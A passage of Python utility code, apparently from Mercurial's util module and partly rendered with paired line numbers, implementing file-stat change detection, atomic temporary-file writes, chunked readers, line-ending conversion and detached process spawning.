            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        # don't leave a stray temp file behind on any failure
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp
2192
2190
class filestat(object):
    """help to exactly detect change of a file

    'stat' attribute is result of 'os.stat()' if specified 'path'
    exists. Otherwise, it is None. This can avoid preparative
    'exists()' examination on client side of this class.
    """
    def __init__(self, stat):
        # stat: an os.stat() result, or None for a missing file
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        """Build a filestat for path; a missing file yields stat=None."""
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        """Build a filestat from an open file object."""
        stat = os.fstat(fp.fileno())
        return cls(stat)

    # instances are mutable-by-attribute but hashed by identity
    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            # "both files missing" compares equal
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        by confliction between such mtime.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # mask keeps the advanced mtime a positive 31-bit value
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        # explicit inverse of __eq__ (required on Python 2)
        return not self == other
2294
2292
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Flush the temp copy and rename it over the permanent name."""
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            # oldstat is only gathered when ambiguity checking is on
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Drop all writes: remove the temp copy, leave the target alone."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on clean exit, discard if an exception is propagating
        if exctype is not None:
            self.discard()
        else:
            self.close()
2357
2355
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty

    With ignoremissing=True a nonexistent f is not an error.
    """
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2369
2367
2370 def tryunlink(f):
2368 def tryunlink(f):
2371 """Attempt to remove a file, ignoring ENOENT errors."""
2369 """Attempt to remove a file, ignoring ENOENT errors."""
2372 try:
2370 try:
2373 unlink(f)
2371 unlink(f)
2374 except OSError as e:
2372 except OSError as e:
2375 if e.errno != errno.ENOENT:
2373 if e.errno != errno.ENOENT:
2376 raise
2374 raise
2377
2375
2378 def makedirs(name, mode=None, notindexed=False):
2376 def makedirs(name, mode=None, notindexed=False):
2379 """recursive directory creation with parent mode inheritance
2377 """recursive directory creation with parent mode inheritance
2380
2378
2381 Newly created directories are marked as "not to be indexed by
2379 Newly created directories are marked as "not to be indexed by
2382 the content indexing service", if ``notindexed`` is specified
2380 the content indexing service", if ``notindexed`` is specified
2383 for "write" mode access.
2381 for "write" mode access.
2384 """
2382 """
2385 try:
2383 try:
2386 makedir(name, notindexed)
2384 makedir(name, notindexed)
2387 except OSError as err:
2385 except OSError as err:
2388 if err.errno == errno.EEXIST:
2386 if err.errno == errno.EEXIST:
2389 return
2387 return
2390 if err.errno != errno.ENOENT or not name:
2388 if err.errno != errno.ENOENT or not name:
2391 raise
2389 raise
2392 parent = os.path.dirname(os.path.abspath(name))
2390 parent = os.path.dirname(os.path.abspath(name))
2393 if parent == name:
2391 if parent == name:
2394 raise
2392 raise
2395 makedirs(parent, mode, notindexed)
2393 makedirs(parent, mode, notindexed)
2396 try:
2394 try:
2397 makedir(name, notindexed)
2395 makedir(name, notindexed)
2398 except OSError as err:
2396 except OSError as err:
2399 # Catch EEXIST to handle races
2397 # Catch EEXIST to handle races
2400 if err.errno == errno.EEXIST:
2398 if err.errno == errno.EEXIST:
2401 return
2399 return
2402 raise
2400 raise
2403 if mode is not None:
2401 if mode is not None:
2404 os.chmod(name, mode)
2402 os.chmod(name, mode)
2405
2403
2406 def readfile(path):
2404 def readfile(path):
2407 with open(path, 'rb') as fp:
2405 with open(path, 'rb') as fp:
2408 return fp.read()
2406 return fp.read()
2409
2407
2410 def writefile(path, text):
2408 def writefile(path, text):
2411 with open(path, 'wb') as fp:
2409 with open(path, 'wb') as fp:
2412 fp.write(text)
2410 fp.write(text)
2413
2411
2414 def appendfile(path, text):
2412 def appendfile(path, text):
2415 with open(path, 'ab') as fp:
2413 with open(path, 'ab') as fp:
2416 fp.write(text)
2414 fp.write(text)
2417
2415
2418 class chunkbuffer(object):
2416 class chunkbuffer(object):
2419 """Allow arbitrary sized chunks of data to be efficiently read from an
2417 """Allow arbitrary sized chunks of data to be efficiently read from an
2420 iterator over chunks of arbitrary size."""
2418 iterator over chunks of arbitrary size."""
2421
2419
2422 def __init__(self, in_iter):
2420 def __init__(self, in_iter):
2423 """in_iter is the iterator that's iterating over the input chunks."""
2421 """in_iter is the iterator that's iterating over the input chunks."""
2424 def splitbig(chunks):
2422 def splitbig(chunks):
2425 for chunk in chunks:
2423 for chunk in chunks:
2426 if len(chunk) > 2**20:
2424 if len(chunk) > 2**20:
2427 pos = 0
2425 pos = 0
2428 while pos < len(chunk):
2426 while pos < len(chunk):
2429 end = pos + 2 ** 18
2427 end = pos + 2 ** 18
2430 yield chunk[pos:end]
2428 yield chunk[pos:end]
2431 pos = end
2429 pos = end
2432 else:
2430 else:
2433 yield chunk
2431 yield chunk
2434 self.iter = splitbig(in_iter)
2432 self.iter = splitbig(in_iter)
2435 self._queue = collections.deque()
2433 self._queue = collections.deque()
2436 self._chunkoffset = 0
2434 self._chunkoffset = 0
2437
2435
2438 def read(self, l=None):
2436 def read(self, l=None):
2439 """Read L bytes of data from the iterator of chunks of data.
2437 """Read L bytes of data from the iterator of chunks of data.
2440 Returns less than L bytes if the iterator runs dry.
2438 Returns less than L bytes if the iterator runs dry.
2441
2439
2442 If size parameter is omitted, read everything"""
2440 If size parameter is omitted, read everything"""
2443 if l is None:
2441 if l is None:
2444 return ''.join(self.iter)
2442 return ''.join(self.iter)
2445
2443
2446 left = l
2444 left = l
2447 buf = []
2445 buf = []
2448 queue = self._queue
2446 queue = self._queue
2449 while left > 0:
2447 while left > 0:
2450 # refill the queue
2448 # refill the queue
2451 if not queue:
2449 if not queue:
2452 target = 2**18
2450 target = 2**18
2453 for chunk in self.iter:
2451 for chunk in self.iter:
2454 queue.append(chunk)
2452 queue.append(chunk)
2455 target -= len(chunk)
2453 target -= len(chunk)
2456 if target <= 0:
2454 if target <= 0:
2457 break
2455 break
2458 if not queue:
2456 if not queue:
2459 break
2457 break
2460
2458
2461 # The easy way to do this would be to queue.popleft(), modify the
2459 # The easy way to do this would be to queue.popleft(), modify the
2462 # chunk (if necessary), then queue.appendleft(). However, for cases
2460 # chunk (if necessary), then queue.appendleft(). However, for cases
2463 # where we read partial chunk content, this incurs 2 dequeue
2461 # where we read partial chunk content, this incurs 2 dequeue
2464 # mutations and creates a new str for the remaining chunk in the
2462 # mutations and creates a new str for the remaining chunk in the
2465 # queue. Our code below avoids this overhead.
2463 # queue. Our code below avoids this overhead.
2466
2464
2467 chunk = queue[0]
2465 chunk = queue[0]
2468 chunkl = len(chunk)
2466 chunkl = len(chunk)
2469 offset = self._chunkoffset
2467 offset = self._chunkoffset
2470
2468
2471 # Use full chunk.
2469 # Use full chunk.
2472 if offset == 0 and left >= chunkl:
2470 if offset == 0 and left >= chunkl:
2473 left -= chunkl
2471 left -= chunkl
2474 queue.popleft()
2472 queue.popleft()
2475 buf.append(chunk)
2473 buf.append(chunk)
2476 # self._chunkoffset remains at 0.
2474 # self._chunkoffset remains at 0.
2477 continue
2475 continue
2478
2476
2479 chunkremaining = chunkl - offset
2477 chunkremaining = chunkl - offset
2480
2478
2481 # Use all of unconsumed part of chunk.
2479 # Use all of unconsumed part of chunk.
2482 if left >= chunkremaining:
2480 if left >= chunkremaining:
2483 left -= chunkremaining
2481 left -= chunkremaining
2484 queue.popleft()
2482 queue.popleft()
2485 # offset == 0 is enabled by block above, so this won't merely
2483 # offset == 0 is enabled by block above, so this won't merely
2486 # copy via ``chunk[0:]``.
2484 # copy via ``chunk[0:]``.
2487 buf.append(chunk[offset:])
2485 buf.append(chunk[offset:])
2488 self._chunkoffset = 0
2486 self._chunkoffset = 0
2489
2487
2490 # Partial chunk needed.
2488 # Partial chunk needed.
2491 else:
2489 else:
2492 buf.append(chunk[offset:offset + left])
2490 buf.append(chunk[offset:offset + left])
2493 self._chunkoffset += left
2491 self._chunkoffset += left
2494 left -= chunkremaining
2492 left -= chunkremaining
2495
2493
2496 return ''.join(buf)
2494 return ''.join(buf)
2497
2495
2498 def filechunkiter(f, size=131072, limit=None):
2496 def filechunkiter(f, size=131072, limit=None):
2499 """Create a generator that produces the data in the file size
2497 """Create a generator that produces the data in the file size
2500 (default 131072) bytes at a time, up to optional limit (default is
2498 (default 131072) bytes at a time, up to optional limit (default is
2501 to read all data). Chunks may be less than size bytes if the
2499 to read all data). Chunks may be less than size bytes if the
2502 chunk is the last chunk in the file, or the file is a socket or
2500 chunk is the last chunk in the file, or the file is a socket or
2503 some other type of file that sometimes reads less data than is
2501 some other type of file that sometimes reads less data than is
2504 requested."""
2502 requested."""
2505 assert size >= 0
2503 assert size >= 0
2506 assert limit is None or limit >= 0
2504 assert limit is None or limit >= 0
2507 while True:
2505 while True:
2508 if limit is None:
2506 if limit is None:
2509 nbytes = size
2507 nbytes = size
2510 else:
2508 else:
2511 nbytes = min(limit, size)
2509 nbytes = min(limit, size)
2512 s = nbytes and f.read(nbytes)
2510 s = nbytes and f.read(nbytes)
2513 if not s:
2511 if not s:
2514 break
2512 break
2515 if limit:
2513 if limit:
2516 limit -= len(s)
2514 limit -= len(s)
2517 yield s
2515 yield s
2518
2516
2519 class cappedreader(object):
2517 class cappedreader(object):
2520 """A file object proxy that allows reading up to N bytes.
2518 """A file object proxy that allows reading up to N bytes.
2521
2519
2522 Given a source file object, instances of this type allow reading up to
2520 Given a source file object, instances of this type allow reading up to
2523 N bytes from that source file object. Attempts to read past the allowed
2521 N bytes from that source file object. Attempts to read past the allowed
2524 limit are treated as EOF.
2522 limit are treated as EOF.
2525
2523
2526 It is assumed that I/O is not performed on the original file object
2524 It is assumed that I/O is not performed on the original file object
2527 in addition to I/O that is performed by this instance. If there is,
2525 in addition to I/O that is performed by this instance. If there is,
2528 state tracking will get out of sync and unexpected results will ensue.
2526 state tracking will get out of sync and unexpected results will ensue.
2529 """
2527 """
2530 def __init__(self, fh, limit):
2528 def __init__(self, fh, limit):
2531 """Allow reading up to <limit> bytes from <fh>."""
2529 """Allow reading up to <limit> bytes from <fh>."""
2532 self._fh = fh
2530 self._fh = fh
2533 self._left = limit
2531 self._left = limit
2534
2532
2535 def read(self, n=-1):
2533 def read(self, n=-1):
2536 if not self._left:
2534 if not self._left:
2537 return b''
2535 return b''
2538
2536
2539 if n < 0:
2537 if n < 0:
2540 n = self._left
2538 n = self._left
2541
2539
2542 data = self._fh.read(min(n, self._left))
2540 data = self._fh.read(min(n, self._left))
2543 self._left -= len(data)
2541 self._left -= len(data)
2544 assert self._left >= 0
2542 assert self._left >= 0
2545
2543
2546 return data
2544 return data
2547
2545
2548 def readinto(self, b):
2546 def readinto(self, b):
2549 res = self.read(len(b))
2547 res = self.read(len(b))
2550 if res is None:
2548 if res is None:
2551 return None
2549 return None
2552
2550
2553 b[0:len(res)] = res
2551 b[0:len(res)] = res
2554 return len(res)
2552 return len(res)
2555
2553
2556 def unitcountfn(*unittable):
2554 def unitcountfn(*unittable):
2557 '''return a function that renders a readable count of some quantity'''
2555 '''return a function that renders a readable count of some quantity'''
2558
2556
2559 def go(count):
2557 def go(count):
2560 for multiplier, divisor, format in unittable:
2558 for multiplier, divisor, format in unittable:
2561 if abs(count) >= divisor * multiplier:
2559 if abs(count) >= divisor * multiplier:
2562 return format % (count / float(divisor))
2560 return format % (count / float(divisor))
2563 return unittable[-1][2] % count
2561 return unittable[-1][2] % count
2564
2562
2565 return go
2563 return go
2566
2564
2567 def processlinerange(fromline, toline):
2565 def processlinerange(fromline, toline):
2568 """Check that linerange <fromline>:<toline> makes sense and return a
2566 """Check that linerange <fromline>:<toline> makes sense and return a
2569 0-based range.
2567 0-based range.
2570
2568
2571 >>> processlinerange(10, 20)
2569 >>> processlinerange(10, 20)
2572 (9, 20)
2570 (9, 20)
2573 >>> processlinerange(2, 1)
2571 >>> processlinerange(2, 1)
2574 Traceback (most recent call last):
2572 Traceback (most recent call last):
2575 ...
2573 ...
2576 ParseError: line range must be positive
2574 ParseError: line range must be positive
2577 >>> processlinerange(0, 5)
2575 >>> processlinerange(0, 5)
2578 Traceback (most recent call last):
2576 Traceback (most recent call last):
2579 ...
2577 ...
2580 ParseError: fromline must be strictly positive
2578 ParseError: fromline must be strictly positive
2581 """
2579 """
2582 if toline - fromline < 0:
2580 if toline - fromline < 0:
2583 raise error.ParseError(_("line range must be positive"))
2581 raise error.ParseError(_("line range must be positive"))
2584 if fromline < 1:
2582 if fromline < 1:
2585 raise error.ParseError(_("fromline must be strictly positive"))
2583 raise error.ParseError(_("fromline must be strictly positive"))
2586 return fromline - 1, toline
2584 return fromline - 1, toline
2587
2585
2588 bytecount = unitcountfn(
2586 bytecount = unitcountfn(
2589 (100, 1 << 30, _('%.0f GB')),
2587 (100, 1 << 30, _('%.0f GB')),
2590 (10, 1 << 30, _('%.1f GB')),
2588 (10, 1 << 30, _('%.1f GB')),
2591 (1, 1 << 30, _('%.2f GB')),
2589 (1, 1 << 30, _('%.2f GB')),
2592 (100, 1 << 20, _('%.0f MB')),
2590 (100, 1 << 20, _('%.0f MB')),
2593 (10, 1 << 20, _('%.1f MB')),
2591 (10, 1 << 20, _('%.1f MB')),
2594 (1, 1 << 20, _('%.2f MB')),
2592 (1, 1 << 20, _('%.2f MB')),
2595 (100, 1 << 10, _('%.0f KB')),
2593 (100, 1 << 10, _('%.0f KB')),
2596 (10, 1 << 10, _('%.1f KB')),
2594 (10, 1 << 10, _('%.1f KB')),
2597 (1, 1 << 10, _('%.2f KB')),
2595 (1, 1 << 10, _('%.2f KB')),
2598 (1, 1, _('%.0f bytes')),
2596 (1, 1, _('%.0f bytes')),
2599 )
2597 )
2600
2598
2601 class transformingwriter(object):
2599 class transformingwriter(object):
2602 """Writable file wrapper to transform data by function"""
2600 """Writable file wrapper to transform data by function"""
2603
2601
2604 def __init__(self, fp, encode):
2602 def __init__(self, fp, encode):
2605 self._fp = fp
2603 self._fp = fp
2606 self._encode = encode
2604 self._encode = encode
2607
2605
2608 def close(self):
2606 def close(self):
2609 self._fp.close()
2607 self._fp.close()
2610
2608
2611 def flush(self):
2609 def flush(self):
2612 self._fp.flush()
2610 self._fp.flush()
2613
2611
2614 def write(self, data):
2612 def write(self, data):
2615 return self._fp.write(self._encode(data))
2613 return self._fp.write(self._encode(data))
2616
2614
2617 # Matches a single EOL which can either be a CRLF where repeated CR
2615 # Matches a single EOL which can either be a CRLF where repeated CR
2618 # are removed or a LF. We do not care about old Macintosh files, so a
2616 # are removed or a LF. We do not care about old Macintosh files, so a
2619 # stray CR is an error.
2617 # stray CR is an error.
2620 _eolre = remod.compile(br'\r*\n')
2618 _eolre = remod.compile(br'\r*\n')
2621
2619
2622 def tolf(s):
2620 def tolf(s):
2623 return _eolre.sub('\n', s)
2621 return _eolre.sub('\n', s)
2624
2622
2625 def tocrlf(s):
2623 def tocrlf(s):
2626 return _eolre.sub('\r\n', s)
2624 return _eolre.sub('\r\n', s)
2627
2625
2628 def _crlfwriter(fp):
2626 def _crlfwriter(fp):
2629 return transformingwriter(fp, tocrlf)
2627 return transformingwriter(fp, tocrlf)
2630
2628
2631 if pycompat.oslinesep == '\r\n':
2629 if pycompat.oslinesep == '\r\n':
2632 tonativeeol = tocrlf
2630 tonativeeol = tocrlf
2633 fromnativeeol = tolf
2631 fromnativeeol = tolf
2634 nativeeolwriter = _crlfwriter
2632 nativeeolwriter = _crlfwriter
2635 else:
2633 else:
2636 tonativeeol = pycompat.identity
2634 tonativeeol = pycompat.identity
2637 fromnativeeol = pycompat.identity
2635 fromnativeeol = pycompat.identity
2638 nativeeolwriter = pycompat.identity
2636 nativeeolwriter = pycompat.identity
2639
2637
2640 if (pyplatform.python_implementation() == 'CPython' and
2638 if (pyplatform.python_implementation() == 'CPython' and
2641 sys.version_info < (3, 0)):
2639 sys.version_info < (3, 0)):
2642 # There is an issue in CPython that some IO methods do not handle EINTR
2640 # There is an issue in CPython that some IO methods do not handle EINTR
2643 # correctly. The following table shows what CPython version (and functions)
2641 # correctly. The following table shows what CPython version (and functions)
2644 # are affected (buggy: has the EINTR bug, okay: otherwise):
2642 # are affected (buggy: has the EINTR bug, okay: otherwise):
2645 #
2643 #
2646 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2644 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2647 # --------------------------------------------------
2645 # --------------------------------------------------
2648 # fp.__iter__ | buggy | buggy | okay
2646 # fp.__iter__ | buggy | buggy | okay
2649 # fp.read* | buggy | okay [1] | okay
2647 # fp.read* | buggy | okay [1] | okay
2650 #
2648 #
2651 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2649 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2652 #
2650 #
2653 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2651 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2654 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2652 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2655 #
2653 #
2656 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2654 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2657 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2655 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2658 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2656 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2659 # fp.__iter__ but not other fp.read* methods.
2657 # fp.__iter__ but not other fp.read* methods.
2660 #
2658 #
2661 # On modern systems like Linux, the "read" syscall cannot be interrupted
2659 # On modern systems like Linux, the "read" syscall cannot be interrupted
2662 # when reading "fast" files like on-disk files. So the EINTR issue only
2660 # when reading "fast" files like on-disk files. So the EINTR issue only
2663 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2661 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2664 # files approximately as "fast" files and use the fast (unsafe) code path,
2662 # files approximately as "fast" files and use the fast (unsafe) code path,
2665 # to minimize the performance impact.
2663 # to minimize the performance impact.
2666 if sys.version_info >= (2, 7, 4):
2664 if sys.version_info >= (2, 7, 4):
2667 # fp.readline deals with EINTR correctly, use it as a workaround.
2665 # fp.readline deals with EINTR correctly, use it as a workaround.
2668 def _safeiterfile(fp):
2666 def _safeiterfile(fp):
2669 return iter(fp.readline, '')
2667 return iter(fp.readline, '')
2670 else:
2668 else:
2671 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2669 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2672 # note: this may block longer than necessary because of bufsize.
2670 # note: this may block longer than necessary because of bufsize.
2673 def _safeiterfile(fp, bufsize=4096):
2671 def _safeiterfile(fp, bufsize=4096):
2674 fd = fp.fileno()
2672 fd = fp.fileno()
2675 line = ''
2673 line = ''
2676 while True:
2674 while True:
2677 try:
2675 try:
2678 buf = os.read(fd, bufsize)
2676 buf = os.read(fd, bufsize)
2679 except OSError as ex:
2677 except OSError as ex:
2680 # os.read only raises EINTR before any data is read
2678 # os.read only raises EINTR before any data is read
2681 if ex.errno == errno.EINTR:
2679 if ex.errno == errno.EINTR:
2682 continue
2680 continue
2683 else:
2681 else:
2684 raise
2682 raise
2685 line += buf
2683 line += buf
2686 if '\n' in buf:
2684 if '\n' in buf:
2687 splitted = line.splitlines(True)
2685 splitted = line.splitlines(True)
2688 line = ''
2686 line = ''
2689 for l in splitted:
2687 for l in splitted:
2690 if l[-1] == '\n':
2688 if l[-1] == '\n':
2691 yield l
2689 yield l
2692 else:
2690 else:
2693 line = l
2691 line = l
2694 if not buf:
2692 if not buf:
2695 break
2693 break
2696 if line:
2694 if line:
2697 yield line
2695 yield line
2698
2696
2699 def iterfile(fp):
2697 def iterfile(fp):
2700 fastpath = True
2698 fastpath = True
2701 if type(fp) is file:
2699 if type(fp) is file:
2702 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2700 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2703 if fastpath:
2701 if fastpath:
2704 return fp
2702 return fp
2705 else:
2703 else:
2706 return _safeiterfile(fp)
2704 return _safeiterfile(fp)
2707 else:
2705 else:
2708 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2706 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2709 def iterfile(fp):
2707 def iterfile(fp):
2710 return fp
2708 return fp
2711
2709
2712 def iterlines(iterator):
2710 def iterlines(iterator):
2713 for chunk in iterator:
2711 for chunk in iterator:
2714 for line in chunk.splitlines():
2712 for line in chunk.splitlines():
2715 yield line
2713 yield line
2716
2714
2717 def expandpath(path):
2715 def expandpath(path):
2718 return os.path.expanduser(os.path.expandvars(path))
2716 return os.path.expanduser(os.path.expandvars(path))
2719
2717
2720 def hgcmd():
2718 def hgcmd():
2721 """Return the command used to execute current hg
2719 """Return the command used to execute current hg
2722
2720
2723 This is different from hgexecutable() because on Windows we want
2721 This is different from hgexecutable() because on Windows we want
2724 to avoid things opening new shell windows like batch files, so we
2722 to avoid things opening new shell windows like batch files, so we
2725 get either the python call or current executable.
2723 get either the python call or current executable.
2726 """
2724 """
2727 if mainfrozen():
2725 if mainfrozen():
2728 if getattr(sys, 'frozen', None) == 'macosx_app':
2726 if getattr(sys, 'frozen', None) == 'macosx_app':
2729 # Env variable set by py2app
2727 # Env variable set by py2app
2730 return [encoding.environ['EXECUTABLEPATH']]
2728 return [encoding.environ['EXECUTABLEPATH']]
2731 else:
2729 else:
2732 return [pycompat.sysexecutable]
2730 return [pycompat.sysexecutable]
2733 return gethgcmd()
2731 return gethgcmd()
2734
2732
2735 def rundetached(args, condfn):
2733 def rundetached(args, condfn):
2736 """Execute the argument list in a detached process.
2734 """Execute the argument list in a detached process.
2737
2735
2738 condfn is a callable which is called repeatedly and should return
2736 condfn is a callable which is called repeatedly and should return
2739 True once the child process is known to have started successfully.
2737 True once the child process is known to have started successfully.
2740 At this point, the child process PID is returned. If the child
2738 At this point, the child process PID is returned. If the child
2741 process fails to start or finishes before condfn() evaluates to
2739 process fails to start or finishes before condfn() evaluates to
2742 True, return -1.
2740 True, return -1.
2743 """
2741 """
2744 # Windows case is easier because the child process is either
2742 # Windows case is easier because the child process is either
2745 # successfully starting and validating the condition or exiting
2743 # successfully starting and validating the condition or exiting
2746 # on failure. We just poll on its PID. On Unix, if the child
2744 # on failure. We just poll on its PID. On Unix, if the child
2747 # process fails to start, it will be left in a zombie state until
2745 # process fails to start, it will be left in a zombie state until
2748 # the parent wait on it, which we cannot do since we expect a long
2746 # the parent wait on it, which we cannot do since we expect a long
2749 # running process on success. Instead we listen for SIGCHLD telling
2747 # running process on success. Instead we listen for SIGCHLD telling
2750 # us our child process terminated.
2748 # us our child process terminated.
2751 terminated = set()
2749 terminated = set()
2752 def handler(signum, frame):
2750 def handler(signum, frame):
2753 terminated.add(os.wait())
2751 terminated.add(os.wait())
2754 prevhandler = None
2752 prevhandler = None
2755 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2753 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2756 if SIGCHLD is not None:
2754 if SIGCHLD is not None:
2757 prevhandler = signal.signal(SIGCHLD, handler)
2755 prevhandler = signal.signal(SIGCHLD, handler)
2758 try:
2756 try:
2759 pid = spawndetached(args)
2757 pid = spawndetached(args)
2760 while not condfn():
2758 while not condfn():
2761 if ((pid in terminated or not testpid(pid))
2759 if ((pid in terminated or not testpid(pid))
2762 and not condfn()):
2760 and not condfn()):
2763 return -1
2761 return -1
2764 time.sleep(0.1)
2762 time.sleep(0.1)
2765 return pid
2763 return pid
2766 finally:
2764 finally:
2767 if prevhandler is not None:
2765 if prevhandler is not None:
2768 signal.signal(signal.SIGCHLD, prevhandler)
2766 signal.signal(signal.SIGCHLD, prevhandler)
2769
2767
2770 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2768 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2771 """Return the result of interpolating items in the mapping into string s.
2769 """Return the result of interpolating items in the mapping into string s.
2772
2770
2773 prefix is a single character string, or a two character string with
2771 prefix is a single character string, or a two character string with
2774 a backslash as the first character if the prefix needs to be escaped in
2772 a backslash as the first character if the prefix needs to be escaped in
2775 a regular expression.
2773 a regular expression.
2776
2774
2777 fn is an optional function that will be applied to the replacement text
2775 fn is an optional function that will be applied to the replacement text
2778 just before replacement.
2776 just before replacement.
2779
2777
2780 escape_prefix is an optional flag that allows using doubled prefix for
2778 escape_prefix is an optional flag that allows using doubled prefix for
2781 its escaping.
2779 its escaping.
2782 """
2780 """
2783 fn = fn or (lambda s: s)
2781 fn = fn or (lambda s: s)
2784 patterns = '|'.join(mapping.keys())
2782 patterns = '|'.join(mapping.keys())
2785 if escape_prefix:
2783 if escape_prefix:
2786 patterns += '|' + prefix
2784 patterns += '|' + prefix
2787 if len(prefix) > 1:
2785 if len(prefix) > 1:
2788 prefix_char = prefix[1:]
2786 prefix_char = prefix[1:]
2789 else:
2787 else:
2790 prefix_char = prefix
2788 prefix_char = prefix
2791 mapping[prefix_char] = prefix_char
2789 mapping[prefix_char] = prefix_char
2792 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2790 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2793 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2791 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2794
2792
2795 def getport(port):
2793 def getport(port):
2796 """Return the port for a given network service.
2794 """Return the port for a given network service.
2797
2795
2798 If port is an integer, it's returned as is. If it's a string, it's
2796 If port is an integer, it's returned as is. If it's a string, it's
2799 looked up using socket.getservbyname(). If there's no matching
2797 looked up using socket.getservbyname(). If there's no matching
2800 service, error.Abort is raised.
2798 service, error.Abort is raised.
2801 """
2799 """
2802 try:
2800 try:
2803 return int(port)
2801 return int(port)
2804 except ValueError:
2802 except ValueError:
2805 pass
2803 pass
2806
2804
2807 try:
2805 try:
2808 return socket.getservbyname(pycompat.sysstr(port))
